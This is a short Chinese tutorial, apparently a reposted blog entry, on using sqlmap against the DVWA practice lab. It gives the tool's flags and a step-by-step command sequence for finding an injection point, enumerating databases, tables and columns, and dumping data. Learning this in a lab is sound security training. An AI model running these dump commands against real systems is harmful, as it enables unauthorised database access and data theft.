码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap工具的简单使用

时间:2020-09-10 22:51:34      阅读:63      评论:0      收藏:0      [点我收藏+]

标签:数据   ble   mic   文章   sqlmap   指定字段   server   通过   自动化   

0x00 sqlmap简介:sqlmap是一款针对sql漏洞的自动化注入工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 官方网站下载http://sqlmap.org/

sqlmap基于python环境下使用,可运行于win系统和linux系,主要是看大家的习惯使用即可。

sqlmap支持的数据库有:(MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB)

本文章以dvwa靶场做实验。

0x01 sqlmap 的参数介绍:

-u #注入点

--dbs #列出所有数据库

--tables #列出所有表名

--columns #列出字段

--dump-all #列出所有数据库所有表

-D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段

0x02 sqlmap的测试步骤:

sqlmap -u “url”

探测到了有注入漏洞,就可以往下一步进行了

 技术图片

 

 

暴库:

sqlmap -u “url” --dbs #通过探测知道是那个数据库,可以用--dbms 数据库,探测指定的数据库,这样速度会快一点

技术图片

 

 

爆表:

sqlmap -u “url” -D “数据库” --tables

技术图片

 

 

爆字段:

sqlmap -u “url” -D “数据库” -T “表名” --columns

技术图片

 

爆内容:

sqlmap -u “url” -D “数据库” -T “表名” -C “字段” --dump

技术图片

 

sqlmap工具的简单使用

标签:数据   ble   mic   文章   sqlmap   指定字段   server   通过   自动化   

原文地址:https://www.cnblogs.com/wufengins/p/13584155.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!